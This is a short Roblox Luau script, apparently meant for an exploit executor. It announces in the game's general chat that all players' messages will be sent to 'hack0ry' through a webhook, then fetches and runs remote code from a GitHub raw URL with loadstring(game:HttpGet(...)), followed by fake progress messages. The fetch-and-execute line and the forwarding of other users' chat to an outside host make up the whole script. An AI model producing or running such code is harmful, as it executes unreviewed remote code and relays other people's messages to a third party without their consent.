game.TextChatService.TextChannels.RBXGeneral:SendAsync("Hack0ry has disconnected from the game... but dont worry! hack0ry recently made a script to send all messages you send to him in chat to a webhook!")
game.TextChatService.TextChannels.RBXGeneral:SendAsync("if you would like to talk to hack0ry send a message in the chat and he will receive it.")
task.wait(5)
game.TextChatService.TextChannels.RBXGeneral:SendAsync("starting message bot")
loadstring(game:HttpGet("https://raw.githubusercontent.com/Hackerman694200/hack0ry/main/MessageBot.luau"))()
task.wait(1)
game.TextChatService.TextChannels.RBXGeneral:SendAsync(".")
task.wait(1)
game.TextChatService.TextChannels.RBXGeneral:SendAsync("..")
task.wait(1)
game.TextChatService.TextChannels.RBXGeneral:SendAsync("...")
task.wait(2)
game.TextChatService.TextChannels.RBXGeneral:SendAsync("successfully started script")
